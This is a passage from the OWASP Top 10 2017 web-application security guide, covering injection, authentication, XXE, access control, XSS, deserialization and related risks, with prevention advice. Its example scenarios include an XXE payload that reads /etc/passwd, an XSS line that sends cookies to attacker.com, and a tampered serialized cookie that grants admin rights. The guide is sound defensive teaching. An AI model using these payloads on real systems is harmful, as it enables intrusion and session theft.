• OWASP Cheat Sheet: Query Parameterization
• OWASP Automated Threats to Web Applications – OAT-014
External
• CWE-77: Command Injection
• CWE-89: SQL Injection
• CWE-564: Hibernate Injection
28. • CWE-917: Expression Language Injection
• PortSwigger: Server-side template injection
How to Prevent
Preventing injection requires keeping data separate from
commands and queries.
• The preferred option is to use a safe API, which avoids the use
of the interpreter entirely or provides a parameterized interface,
or migrate to use Object Relational Mapping Tools (ORMs).
Note: Even when parameterized, stored procedures can still
introduce SQL injection if PL/SQL or T-SQL concatenates
queries and data, or executes hostile data with EXECUTE
IMMEDIATE or exec().
• Use positive or "whitelist" server-side input validation. This is
not a complete defense as many applications require special
characters, such as text areas or APIs for mobile applications.
• For any residual dynamic queries, escape special characters
using the specific escape syntax for that interpreter.
Note: SQL structure such as table names, column names, and
so on cannot be escaped, and thus user-supplied structure
names are dangerous. This is a common issue in report-writing
software.
• Use LIMIT and other SQL controls within queries to prevent
mass disclosure of records in case of SQL injection.
A1
:2017
Injection
Exploitability: 3 Prevalence: 2 Detectability: 3 Technical: 3
29. Almost any source of data can be an
injection vector, environment
variables, parameters, external and
internal web services, and all types of
users. Injection flaws occur when an
attacker can send hostile data to an
interpreter.
Injection flaws are very prevalent, particularly in
legacy code. Injection vulnerabilities are often found
in SQL, LDAP, XPath, or NoSQL queries, OS
commands, XML parsers, SMTP headers,
expression languages, and ORM queries.
Injection flaws are easy to discover when examining
code. Scanners and fuzzers can help attackers find
injection flaws.
Injection can result in data loss,
corruption, or disclosure to
unauthorized parties, loss of
accountability, or denial of access.
Injection can sometimes lead to
complete host takeover.
The business impact depends on the
needs of the application and data.
https://www.owasp.org/index.php/Source_Code_Analysis_Tools
https://www.owasp.org/index.php/Category:Vulnerability_Scann
ing_Tools
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
2:_Parameterize_Queries
https://www.owasp.org/index.php/ASVS_V5_Input_validation_a
nd_output_encoding
31. Vectors
Security
Weakness
Example Attack Scenarios
Scenario #1: Credential stuffing, the use of lists of known
passwords, is a common attack. If an application does not
implement automated threat or credential stuffing protections,
the
application can be used as a password oracle to determine if the
credentials are valid.
Scenario #2: Most authentication attacks occur due to the
continued use of passwords as a sole factor. Once considered
best practices, password rotation and complexity requirements
are viewed as encouraging users to use, and reuse, weak
passwords. Organizations are recommended to stop these
practices per NIST 800-63 and use multi-factor authentication.
Scenario #3: Application session timeouts aren’t set properly. A
user uses a public computer to access an application. Instead of
selecting “logout” the user simply closes the browser tab and
walks away. An attacker uses the same browser an hour later,
and the user is still authenticated.
Is the Application Vulnerable?
Confirmation of the user's identity, authentication, and session
management are critical to protect against authentication-related
attacks.
There may be authentication weaknesses if the application:
• Permits automated attacks such as credential stuffing, where
32. the attacker has a list of valid usernames and passwords.
• Permits brute force or other automated attacks.
• Permits default, weak, or well-known passwords, such as
"Password1" or "admin/admin“.
• Uses weak or ineffective credential recovery and forgot-
password processes, such as "knowledge-based answers",
which cannot be made safe.
• Uses plain text, encrypted, or weakly hashed passwords (see
A3:2017-Sensitive Data Exposure).
• Has missing or ineffective multi-factor authentication.
• Exposes Session IDs in the URL (e.g., URL rewriting).
• Does not rotate Session IDs after successful login.
• Does not properly invalidate Session IDs. User sessions or
authentication tokens (particularly single sign-on (SSO) tokens)
aren’t properly invalidated during logout or a period of
inactivity.
References
OWASP
• OWASP Proactive Controls: Implement Identity and
Authentication Controls
• OWASP ASVS: V2 Authentication, V3 Session Management
• OWASP Testing Guide: Identity, Authentication
• OWASP Cheat Sheet: Authentication
33. • OWASP Cheat Sheet: Credential Stuffing
• OWASP Cheat Sheet: Forgot Password
• OWASP Cheat Sheet: Session Management
• OWASP Automated Threats Handbook
External
• NIST 800-63b: 5.1.1 Memorized Secrets
• CWE-287: Improper Authentication
• CWE-384: Session Fixation
How to Prevent
• Where possible, implement multi-factor authentication to
prevent automated, credential stuffing, brute force, and stolen
credential re-use attacks.
• Do not ship or deploy with any default credentials,
particularly
for admin users.
• Implement weak-password checks, such as testing new or
changed passwords against a list of the top 10000 worst
passwords.
• Align password length, complexity and rotation policies with
NIST 800-63 B's guidelines in section 5.1.1 for Memorized
Secrets or other modern, evidence based password policies.
• Ensure registration, credential recovery, and API pathways are
hardened against account enumeration attacks by using the
34. same messages for all outcomes.
• Limit or increasingly delay failed login attempts. Log all
failures
and alert administrators when credential stuffing, brute force, or
other attacks are detected.
• Use a server-side, secure, built-in session manager that
generates a new random session ID with high entropy after
login. Session IDs should not be in the URL, be securely stored
and invalidated after logout, idle, and absolute timeouts.
A2
:2017
Broken Authentication
Exploitability: 3 Prevalence: 2 Detectability: 2 Technical: 3
Attackers have access to hundreds of
millions of valid username and
password combinations for credential
stuffing, default administrative
account lists, automated brute force,
and dictionary attack tools. Session
management attacks are well
understood, particularly in relation to
unexpired session tokens.
The prevalence of broken authentication is
widespread due to the design and implementation of
most identity and access controls. Session manage-
ment is the bedrock of authentication and access
controls, and is present in all stateful applications.
Attackers can detect broken authentication using
35. manual means and exploit them using automated
tools with password lists and dictionary attacks.
Attackers have to gain access to only
a few accounts, or just one admin
account to compromise the system.
Depending on the domain of the
application, this may allow money
laundering, social security fraud, and
identity theft, or disclose legally
protected highly sensitive information.
https://www.owasp.org/index.php/Credential_stuffing
https://github.com/danielmiessler/SecLists
https://www.owasp.org/index.php/Credential_stuffing
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
5:_Implement_Identity_and_Authentication_Controls
http:// Authentication
https://www.owasp.org/index.php/Category:OWASP_Applicatio
n_Security_Verification_Standard_Project#tab=Home
https://www.owasp.org/index.php/Testing_Identity_Managemen
t
https://www.owasp.org/index.php/Testing_for_authentication
https://www.owasp.org/index.php/Authentication_Cheat_Sheet
https://www.owasp.org/index.php/Credential_Stuffing_Preventi
on_Cheat_Sheet
https://www.owasp.org/index.php/Forgot_Password_Cheat_Shee
t
https://www.owasp.org/index.php/Credential_Stuffing_Preventi
37. injection flaw to retrieve credit card numbers in clear text.
Scenario #2: A site doesn't use or enforce TLS for all pages or
supports weak encryption. An attacker monitors network traffic
(e.g. at an insecure wireless network), downgrades connections
from HTTPS to HTTP, intercepts requests, and steals the user's
session cookie. The attacker then replays this cookie and
hijacks
the user's (authenticated) session, accessing or modifying the
user's private data. Instead of the above they could alter all
transported data, e.g. the recipient of a money transfer.
Scenario #3: The password database uses unsalted or simple
hashes to store everyone's passwords. A file upload flaw allows
an attacker to retrieve the password database. All the unsalted
hashes can be exposed with a rainbow table of pre-calculated
hashes. Hashes generated by simple or fast hash functions may
be cracked by GPUs, even if they were salted.
Is the Application Vulnerable?
The first thing is to determine the protection needs of data in
transit and at rest. For example, passwords, credit card numbers,
health records, personal information and business secrets
require extra protection, particularly if that data falls under
privacy laws, e.g. EU's General Data Protection Regulation
(GDPR), or regulations, e.g. financial data protection such as
PCI Data Security Standard (PCI DSS). For all such data:
• Is any data transmitted in clear text? This concerns protocols
such as HTTP, SMTP, and FTP. External internet traffic is
especially dangerous. Verify all internal traffic e.g. between
load balancers, web servers, or back-end systems.
• Is sensitive data stored in clear text, including backups?
• Are any old or weak cryptographic algorithms used either by
38. default or in older code?
• Are default crypto keys in use, weak crypto keys generated or
re-used, or is proper key management or rotation missing?
• Is encryption not enforced, e.g. are any user agent (browser)
security directives or headers missing?
• Does the user agent (e.g. app, mail client) not verify if the
received server certificate is valid?
See ASVS Crypto (V7), Data Prot (V9) and SSL/TLS (V10)
References
OWASP
• OWASP Proactive Controls: Protect Data
• OWASP Application Security Verification Standard (V7,9,10)
• OWASP Cheat Sheet: Transport Layer Protection
• OWASP Cheat Sheet: User Privacy Protection
• OWASP Cheat Sheets: Password and Cryptographic Storage
• OWASP Security Headers Project; Cheat Sheet: HSTS
• OWASP Testing Guide: Testing for weak cryptography
External
• CWE-220: Exposure of sens. information through data queries
• CWE-310: Cryptographic Issues; CWE-311: Missing
Encryption
• CWE-312: Cleartext Storage of Sensitive Information
39. • CWE-319: Cleartext Transmission of Sensitive Information
• CWE-326: Weak Encryption; CWE-327: Broken/Risky Crypto
• CWE-359: Exposure of Private Information (Privacy
Violation)
How to Prevent
Do the following, at a minimum, and consult the references:
• Classify data processed, stored, or transmitted by an
application. Identify which data is sensitive according to
privacy
laws, regulatory requirements, or business needs.
• Apply controls as per the classification.
• Don’t store sensitive data unnecessarily. Discard it as soon as
possible or use PCI DSS compliant tokenization or even
truncation. Data that is not retained cannot be stolen.
• Make sure to encrypt all sensitive data at rest.
• Ensure up-to-date and strong standard algorithms, protocols,
and keys are in place; use proper key management.
• Encrypt all data in transit with secure protocols such as TLS
with perfect forward secrecy (PFS) ciphers, cipher prioritization
by the server, and secure parameters. Enforce encryption
using directives like HTTP Strict Transport Security (HSTS).
• Disable caching for responses that contain sensitive data.
• Store passwords using strong adaptive and salted hashing
functions with a work factor (delay factor), such as Argon2,
40. scrypt, bcrypt, or PBKDF2.
• Verify independently the effectiveness of configuration and
settings.
A3
:2017
Sensitive Data Exposure
Exploitability: 2 Prevalence: 3 Detectability: 2 Technical: 3
Rather than directly attacking crypto,
attackers steal keys, execute man-in-
the-middle attacks, or steal clear text
data off the server, while in transit, or
from the user’s client, e.g. browser. A
manual attack is generally required.
Previously retrieved password
databases could be brute forced by
Graphics Processing Units (GPUs).
Over the last few years, this has been the most
common impactful attack. The most common flaw is
simply not encrypting sensitive data. When crypto is
employed, weak key generation and management,
and weak algorithm, protocol and cipher usage is
common, particularly for weak password hashing
storage techniques. For data in transit, server side
weaknesses are mainly easy to detect, but hard for
data at rest.
Failure frequently compromises all
data that should have been protected.
Typically, this information includes
sensitive personal information (PII)
41. data such as health records, creden-
tials, personal data, and credit cards,
which often require protection as
defined by laws or regulations such as
the EU GDPR or local privacy laws.
https://www.owasp.org/index.php/ASVS_V7_Cryptography
https://www.owasp.org/index.php/ASVS_V9_Data_Protection
https://www.owasp.org/index.php/ASVS_V10_Communications
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
7:_Protect_Data
https://www.owasp.org/index.php/ASVS_V7_Cryptography
https://www.owasp.org/index.php/ASVS_V9_Data_Protection
https://www.owasp.org/index.php/ASVS_V10_Communications
https://www.owasp.org/index.php/Transport_Layer_Protection_
Cheat_Sheet
https://www.owasp.org/index.php/User_Privacy_Protection_Che
at_Sheet
https://www.owasp.org/index.php/Transport_Layer_Protection_
Cheat_Sheet
https://www.owasp.org/index.php/User_Privacy_Protection_Che
at_Sheet
https://www.owasp.org/index.php/Password_Storage_Cheat_She
et
https://www.owasp.org/index.php/Cryptographic_Storage_Cheat
_Sheet
https://www.owasp.org/index.php/OWASP_Secure_Headers_Pro
ject
https://www.owasp.org/index.php/HTTP_Strict_Transport_Secu
rity_Cheat_Sheet
https://www.owasp.org/index.php/Testing_for_weak_Cryptogra
phy
http://cwe.mitre.org/data/definitions/310.html
http://cwe.mitre.org/data/definitions/310.html
http://cwe.mitre.org/data/definitions/311.html
http://cwe.mitre.org/data/definitions/312.html
43. Scenario #1: The attacker attempts to extract data from the
server:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
Scenario #2: An attacker probes the server's private network by
changing the above ENTITY line to:
<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]>
Scenario #3: An attacker attempts a denial-of-service attack by
including a potentially endless file:
<!ENTITY xxe SYSTEM "file:///dev/random" >]>
Is the Application Vulnerable?
Applications and in particular XML-based web services or
downstream integrations might be vulnerable to attack if:
• The application accepts XML directly or XML uploads,
especially from untrusted sources, or inserts untrusted data into
XML documents, which is then parsed by an XML processor.
• Any of the XML processors in the application or SOAP based
web services has document type definitions (DTDs) enabled.
As the exact mechanism for disabling DTD processing varies
by processor, it is good practice to consult a reference such as
44. the OWASP Cheat Sheet 'XXE Prevention’.
• If your application uses SAML for identity processing within
federated security or single sign on (SSO) purposes. SAML
uses XML for identity assertions, and may be vulnerable.
• If the application uses SOAP prior to version 1.2, it is likely
susceptible to XXE attacks if XML entities are being passed to
the SOAP framework.
• Being vulnerable to XXE attacks likely means that the
application is vulnerable to denial of service attacks including
the Billion Laughs attack.
References
OWASP
• OWASP Application Security Verification Standard
• OWASP Testing Guide: Testing for XML Injection
• OWASP XXE Vulnerability
• OWASP Cheat Sheet: XXE Prevention
• OWASP Cheat Sheet: XML Security
External
• CWE-611: Improper Restriction of XXE
• Billion Laughs Attack
• SAML Security XML External Entity Attack
45. • Detecting and exploiting XXE in SAML Interfaces
How to Prevent
Developer training is essential to identify and mitigate XXE.
Besides that, preventing XXE requires:
• Whenever possible, use less complex data formats such as
JSON, and avoiding serialization of sensitive data.
• Patch or upgrade all XML processors and libraries in use by
the application or on the underlying operating system. Use
dependency checkers. Update SOAP to SOAP 1.2 or higher.
• Disable XML external entity and DTD processing in all XML
parsers in the application, as per the OWASP Cheat Sheet
'XXE Prevention'.
• Implement positive ("whitelisting") server-side input
validation,
filtering, or sanitization to prevent hostile data within XML
documents, headers, or nodes.
• Verify that XML or XSL file upload functionality validates
incoming XML using XSD validation or similar.
• SAST tools can help detect XXE in source code, although
manual code review is the best alternative in large, complex
applications with many integrations.
If these controls are not possible, consider using virtual
patching, API security gateways, or Web Application Firewalls
(WAFs) to detect, monitor, and block XXE attacks.
A4
46. :2017
XML External Entities (XXE)
Exploitability: 2 Prevalence: 2 Detectability: 3 Technical: 3
Attackers can exploit vulnerable XML
processors if they can upload XML or
include hostile content in an XML
document, exploiting vulnerable code,
dependencies or integrations.
By default, many older XML processors allow
specification of an external entity, a URI that is
dereferenced and evaluated during XML processing.
SAST tools can discover this issue by inspecting
dependencies and configuration. DAST tools require
additional manual steps to detect and exploit this
issue. Manual testers need to be trained in how to
test for XXE, as it not commonly tested as of 2017.
These flaws can be used to extract
data, execute a remote request from
the server, scan internal systems,
perform a denial-of-service attack, as
well as execute other attacks.
The business impact depends on the
protection needs of all affected
application and data.
https://www.w3schools.com/xml/xml_dtd_intro.asp
https://www.owasp.org/index.php/XML_External_Entity_(XXE)
_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Category:OWASP_Applicatio
48. Weakness
Example Attack Scenarios
Scenario #1: The application uses unverified data in a SQL call
that is accessing account information:
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery( );
An attacker simply modifies the 'acct' parameter in the browser
to
send whatever account number they want. If not properly
verified, the attacker can access any user's account.
http://example.com/app/accountInfo?acct=notmyacct
Scenario #2: An attacker simply force browses to target URLs.
Admin rights are required for access to the admin page.
http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo
If an unauthenticated user can access either page, it’s a flaw. If
a
non-admin can access the admin page, this is a flaw.
Is the Application Vulnerable?
Access control enforces policy such that users cannot act
outside of their intended permissions. Failures typically lead to
unauthorized information disclosure, modification or
destruction
49. of all data, or performing a business function outside of the
limits
of the user. Common access control vulnerabilities include:
• Bypassing access control checks by modifying the URL,
internal application state, or the HTML page, or simply using a
custom API attack tool.
• Allowing the primary key to be changed to another users
record, permitting viewing or editing someone else's account.
• Elevation of privilege. Acting as a user without being logged
in,
or acting as an admin when logged in as a user.
• Metadata manipulation, such as replaying or tampering with a
JSON Web Token (JWT) access control token or a cookie or
hidden field manipulated to elevate privileges, or abusing JWT
invalidation
• CORS misconfiguration allows unauthorized API access.
• Force browsing to authenticated pages as an unauthenticated
user or to privileged pages as a standard user. Accessing API
with missing access controls for POST, PUT and DELETE.
50. References
OWASP
• OWASP Proactive Controls: Access Controls
• OWASP Application Security Verification Standard: V4
Access
Control
• OWASP Testing Guide: Authorization Testing
• OWASP Cheat Sheet: Access Control
External
• CWE-22: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal')
• CWE-284: Improper Access Control (Authorization)
• CWE-285: Improper Authorization
• CWE-639: Authorization Bypass Through User-Controlled
Key
• PortSwigger: Exploiting CORS Misconfiguration
How to Prevent
Access control is only effective if enforced in trusted server-
side
code or server-less API, where the attacker cannot modify the
access control check or metadata.
• With the exception of public resources, deny by default.
• Implement access control mechanisms once and re-use them
51. throughout the application, including minimizing CORS usage.
• Model access controls should enforce record ownership, rather
than accepting that the user can create, read, update, or delete
any record.
• Unique application business limit requirements should be
enforced by domain models.
• Disable web server directory listing and ensure file metadata
(e.g. .git) and backup files are not present within web roots.
• Log access control failures, alert admins when appropriate
(e.g. repeated failures).
• Rate limit API and controller access to minimize the harm
from
automated attack tooling.
• JWT tokens should be invalidated on the server after logout.
Developers and QA staff should include functional access
control
unit and integration tests.
A5
:2017
Broken Access Control
Exploitability: 2 Prevalence: 2 Detectability: 2 Technical: 3
Exploitation of access control is a
core skill of attackers. SAST and
DAST tools can detect the absence of
access control but cannot verify if it is
52. functional when it is present. Access
control is detectable using manual
means, or possibly through
automation for the absence of access
controls in certain frameworks.
Access control weaknesses are common due to the
lack of automated detection, and lack of effective
functional testing by application developers.
Access control detection is not typically amenable to
automated static or dynamic testing. Manual testing
is the best way to detect missing or ineffective
access control, including HTTP method (GET vs
PUT, etc), controller, direct object references, etc.
The technical impact is attackers
acting as users or administrators, or
users using privileged functions, or
creating, accessing, updating or
deleting every record.
The business impact depends on the
protection needs of the application
and data.
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
6:_Implement_Access_Controls
https://www.owasp.org/index.php/Category:OWASP_Applicatio
n_Security_Verification_Standard_Project#tab=Home
https://www.owasp.org/index.php/Testing_for_Authorization
https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
https://cwe.mitre.org/data/definitions/22.html
https://cwe.mitre.org/data/definitions/284.html
https://cwe.mitre.org/data/definitions/285.html
https://cwe.mitre.org/data/definitions/639.html
54. then finds a serious access control flaw in the application.
Scenario #3: The application server’s configuration allows de-
tailed error messages, e.g. stack traces, to be returned to users.
This potentially exposes sensitive information or underlying
flaws
such as component versions that are known to be vulnerable.
Scenario #4: A cloud service provider has default sharing
permissions open to the Internet by other CSP users. This
allows
sensitive data stored within cloud storage to be accessed.
Is the Application Vulnerable?
The application might be vulnerable if the application is:
• Missing appropriate security hardening across any part of the
application stack, or improperly configured permissions on
cloud services.
• Unnecessary features are enabled or installed (e.g.
unnecessary ports, services, pages, accounts, or privileges).
• Default accounts and their passwords still enabled and
unchanged.
• Error handling reveals stack traces or other overly informative
error messages to users.
• For upgraded systems, latest security features are disabled or
not configured securely.
• The security settings in the application servers, application
frameworks (e.g. Struts, Spring, ASP.NET), libraries,
databases, etc. not set to secure values.
55. • The server does not send security headers or directives or they
are not set to secure values.
• The software is out of date or vulnerable (see A9:2017-Using
Components with Known Vulnerabilities).
Without a concerted, repeatable application security
configuration process, systems are at a higher risk.
References
OWASP
• OWASP Testing Guide: Configuration Management
• OWASP Testing Guide: Testing for Error Codes
• OWASP Security Headers Project
For additional requirements in this area, see the Application
Security Verification Standard V19 Configuration.
External
• NIST Guide to General Server Hardening
• CWE-2: Environmental Security Flaws
• CWE-16: Configuration
• CWE-388: Error Handling
• CIS Security Configuration Guides/Benchmarks
• Amazon S3 Bucket Discovery and Enumeration
How to Prevent
Secure installation processes should be implemented, including:
56. • A repeatable hardening process that makes it fast and easy to
deploy another environment that is properly locked down.
Development, QA, and production environments should all be
configured identically, with different credentials used in each
environment. This process should be automated to minimize
the effort required to setup a new secure environment.
• A minimal platform without any unnecessary features,
components, documentation, and samples. Remove or do not
install unused features and frameworks.
• A task to review and update the configurations appropriate to
all security notes, updates and patches as part of the patch
management process (see A9:2017-Using Components with
Known Vulnerabilities). In particular, review cloud storage
permissions (e.g. S3 bucket permissions).
• A segmented application architecture that provides effective,
secure separation between components or tenants, with
segmentation, containerization, or cloud security groups.
• Sending security directives to clients, e.g. Security Headers.
• An automated process to verify the effectiveness of the
configurations and settings in all environments.
A6
:2017
Security Misconfiguration
Exploitability: 3 Prevalence: 3 Detectability: 3 Technical: 2
Attackers will often attempt to exploit
unpatched flaws or access default
accounts, unused pages, unprotected
57. files and directories, etc to gain
unauthorized access or knowledge of
the system.
Security misconfiguration can happen at any level of
an application stack, including the network services,
platform, web server, application server, database,
frameworks, custom code, and pre-installed virtual
machines, containers, or storage. Automated
scanners are useful for detecting misconfigurations,
use of default accounts or configurations,
unnecessary services, legacy options, etc.
Such flaws frequently give attackers
unauthorized access to some system
data or functionality. Occasionally,
such flaws result in a complete
system compromise.
The business impact depends on the
protection needs of the application
and data.
https://www.owasp.org/index.php/Testing_for_configuration_m
anagement
https://www.owasp.org/index.php/Testing_for_Error_Code_(O
WASP-IG-006)
https://www.owasp.org/index.php/OWASP_Secure_Headers_Pro
ject
https://www.owasp.org/index.php/ASVS_V19_Configuration
https://csrc.nist.gov/publications/detail/sp/800-123/final
https://cwe.mitre.org/data/definitions/2.html
https://cwe.mitre.org/data/definitions/2.html
https://cwe.mitre.org/data/definitions/16.html
https://cwe.mitre.org/data/definitions/388.html
https://www.cisecurity.org/cis-benchmarks/
58. https://blog.websecurify.com/2017/10/aws-s3-bucket-
discovery.html
https://www.owasp.org/index.php/OWASP_Secure_Headers_Pro
ject
App. Specific Business ?
13
Impacts
Threat
Agents
Attack
Vectors
Security
Weakness
Example Attack Scenario
Scenario 1: The application uses untrusted data in the
construction of the following HTML snippet without validation
or
escaping:
(String) page += "<input name='creditcard' type='TEXT'
value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in the browser to:
'><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
59. This attack causes the victim’s session ID to be sent to the
attacker’s website, allowing the attacker to hijack the user’s
current session.
Note: Attackers can use XSS to defeat any automated Cross-
Site Request Forgery ( CSRF) defense the application might
employ.
Is the Application Vulnerable?
There are three forms of XSS, usually targeting users' browsers:
Reflected XSS: The application or API includes unvalidated and
unescaped user input as part of HTML output. A successful
attack can allow the attacker to execute arbitrary HTML and
JavaScript in the victim’s browser. Typically the user will need
to
interact with some malicious link that points to an attacker-
controlled page, such as malicious watering hole websites,
advertisements, or similar.
Stored XSS: The application or API stores unsanitized user
input that is viewed at a later time by another user or an
administrator. Stored XSS is often considered a high or critical
risk.
DOM XSS: JavaScript frameworks, single-page applications,
and
APIs that dynamically include attacker-controllable data to a
page are vulnerable to DOM XSS. Ideally, the application
would
not send attacker-controllable data to unsafe JavaScript APIs.
Typical XSS attacks include session stealing, account takeover,
MFA bypass, DOM node replacement or defacement (such as
trojan login panels), attacks against the user's browser such as
60. malicious software downloads, key logging, and other client-
side
attacks.
References
OWASP
• OWASP Proactive Controls: Encode Data
• OWASP Proactive Controls: Validate Data
• OWASP Application Security Verification Standard: V5
• OWASP Testing Guide: Testing for Reflected XSS
• OWASP Testing Guide: Testing for Stored XSS
• OWASP Testing Guide: Testing for DOM XSS
• OWASP Cheat Sheet: XSS Prevention
• OWASP Cheat Sheet: DOM based XSS Prevention
• OWASP Cheat Sheet: XSS Filter Evasion
• OWASP Java Encoder Project
External
• CWE-79: Improper neutralization of user supplied input
• PortSwigger: Client-side template injection
How to Prevent
Preventing XSS requires separation of untrusted data from
active browser content. This can be achieved by:
• Using frameworks that automatically escape XSS by design,
61. such as the latest Ruby on Rails, React JS. Learn the
limitations of each framework's XSS protection and
appropriately handle the use cases which are not covered.
• Escaping untrusted HTTP request data based on the context in
the HTML output (body, attribute, JavaScript, CSS, or URL)
will
resolve Reflected and Stored XSS vulnerabilities. The OWASP
Cheat Sheet 'XSS Prevention' has details on the required data
escaping techniques.
• Applying context-sensitive encoding when modifying the
browser document on the client side acts against DOM XSS.
When this cannot be avoided, similar context sensitive
escaping techniques can be applied to browser APIs as
described in the OWASP Cheat Sheet 'DOM based XSS
Prevention'.
• Enabling a Content Security Policy (CSP) is a defense-in-
depth
mitigating control against XSS. It is effective if no other
vulnerabilities exist that would allow placing malicious code
via
local file includes (e.g. path traversal overwrites or vulnerable
libraries from permitted content delivery networks).
A7
:2017
Cross-Site Scripting (XSS)
Exploitability: 3 Prevalence: 3 Detectability: 3 Technical: 2
Automated tools can detect and
exploit all three forms of XSS, and
there are freely available exploitation
62. frameworks.
XSS is the second most prevalent issue in the
OWASP Top 10, and is found in around two-thirds of
all applications.
Automated tools can find some XSS problems
automatically, particularly in mature technologies
such as PHP, J2EE / JSP, and ASP.NET.
The impact of XSS is moderate for
reflected and DOM XSS, and severe
for stored XSS, with remote code
execution on the victim's browser,
such as stealing credentials,
sessions, or delivering malware to the
victim.
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
tab=OWASP_Proactive_Controls_2016
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
tab=OWASP_Proactive_Controls_2016
https://www.owasp.org/index.php/Category:OWASP_Applicatio
n_Security_Verification_Standard_Project
https://www.owasp.org/index.php/Testing_for_Reflected_Cross
_site_scripting_(OTG-INPVAL-001)
https://www.owasp.org/index.php/Testing_for_Stored_Cross_sit
e_scripting_(OTG-INPVAL-002)
https://www.owasp.org/index.php/Testing_for_DOM-
based_Cross_site_scripting_(OTG-CLIENT-001)
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_
Prevention_Cheat_Sheet
https://www.owasp.org/index.php/DOM_based_XSS_Prevention
_Cheat_Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_S
heet
64. modifies application logic or achieves arbitrary remote code
execution if there are classes available to the application that
can change behavior during or after deserialization.
• Typical data tampering attacks, such as access-control-related
attacks, where existing data structures are used but the content
is changed.
Serialization may be used in applications for:
• Remote- and inter-process communication (RPC/IPC)
• Wire protocols, web services, message brokers
• Caching/Persistence
• Databases, cache servers, file systems
• HTTP cookies, HTML form parameters, API authentication
tokens
Example Attack Scenarios
Scenario #1: A React application calls a set of Spring Boot
microservices. Being functional programmers, they tried to
ensure that their code is immutable. The solution they came up
with is serializing user state and passing it back and forth with
each request. An attacker notices the "R00" Java object
signature, and uses the Java Serial Killer tool to gain remote
code execution on the application server.
Scenario #2: A PHP forum uses PHP object serialization to save
a "super" cookie, containing the user's user ID, role, password
hash, and other state:
a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";
65. i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
An attacker changes the serialized object to give themselves
admin privileges:
a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";
i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
References
OWASP
• OWASP Cheat Sheet: Deserialization
• OWASP Proactive Controls: Validate All Inputs
• OWASP Application Security Verification Standard
• OWASP AppSecEU 2016: Surviving the Java Deserialization
Apocalypse
• OWASP AppSecUSA 2017: Friday the 13th JSON Attacks
External
• CWE-502: Deserialization of Untrusted Data
• Java Unmarshaller Security
• OWASP AppSec Cali 2015: Marshalling Pickles
How to Prevent
The only safe architectural pattern is not to accept serialized
objects from untrusted sources or to use serialization mediums
that only permit primitive data types.
66. If that is not possible, consider one of more of the following:
• Implementing integrity checks such as digital signatures on
any
serialized objects to prevent hostile object creation or data
tampering.
• Enforcing strict type constraints during deserialization before
object creation as the code typically expects a definable set of
classes. Bypasses to this technique have been demonstrated,
so reliance solely on this is not advisable.
• Isolating and running code that deserializes in low privilege
environments when possible.
• Logging deserialization exceptions and failures, such as where
the incoming type is not the expected type, or the
deserialization throws exceptions.
• Restricting or monitoring incoming and outgoing network
connectivity from containers or servers that deserialize.
• Monitoring deserialization, alerting if a user deserializes
constantly.
A8
:2017
Insecure Deserialization
Exploitability: 1 Prevalence: 2 Detectability: 2 Technical: 3
Exploitation of deserialization is
somewhat difficult, as off the shelf
exploits rarely work without changes
67. or tweaks to the underlying exploit
code.
This issue is included in the Top 10 based on an
industry survey and not on quantifiable data.
Some tools can discover deserialization flaws, but
human assistance is frequently needed to validate
the problem. It is expected that prevalence data for
deserialization flaws will increase as tooling is
developed to help identify and address it.
The impact of deserialization flaws
cannot be understated. These flaws
can lead to remote code execution
attacks, one of the most serious
attacks possible.
The business impact depends on the
protection needs of the application
and data.
https://www.owasp.org/index.php/Deserialization_Cheat_Sheet
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
4:_Validate_All_Inputs
https://www.owasp.org/index.php/Category:OWASP_Applicatio
n_Security_Verification_Standard_Project#tab=Home
https://speakerdeck.com/pwntester/surviving-the-java-
deserialization-apocalypse
https://speakerdeck.com/pwntester/friday-the-13th-json-attacks
https://cwe.mitre.org/data/definitions/502.html
https://github.com/mbechler/marshalsec
http://frohoff.github.io/appseccali-marshalling-pickles/
https://owasp.blogspot.com/2017/08/owasp-top-10-2017-
project-update.html
68. App. Specific Business ?
15
Impacts
Threat
Agents
Attack
Vectors
Security
Weakness
Example Attack Scenarios
Scenario #1: Components typically run with the same privileges
as the application itself, so flaws in any component can result in
serious impact. Such flaws can be accidental (e.g. coding error)
or intentional (e.g. backdoor in component). Some example
exploitable component vulnerabilities discovered are:
• CVE-2017-5638, a Struts 2 remote code execution
vulnerability
that enables execution of arbitrary code on the server, has
been blamed for significant breaches.
• While internet of things (IoT) are frequently difficult or
impossible to patch, the importance of patching them can be
great (e.g. biomedical devices).
69. There are automated tools to help attackers find unpatched or
misconfigured systems. For example, the Shodan IoT search
engine can help you find devices that still suffer from
the Heartbleed vulnerability that was patched in April 2014.
Is the Application Vulnerable?
You are likely vulnerable:
• If you do not know the versions of all components you use
(both client-side and server-side). This includes components
you directly use as well as nested dependencies.
• If software is vulnerable, unsupported, or out of date. This
includes the OS, web/application server, database
management system (DBMS), applications, APIs and all
components, runtime environments, and libraries.
• If you do not scan for vulnerabilities regularly and subscribe
to
security bulletins related to the components you use.
• If you do not fix or upgrade the underlying platform,
frameworks, and dependencies in a risk-based, timely fashion.
This commonly happens in environments when patching is a
monthly or quarterly task under change control, which leaves
organizations open to many days or months of unnecessary
exposure to fixed vulnerabilities.
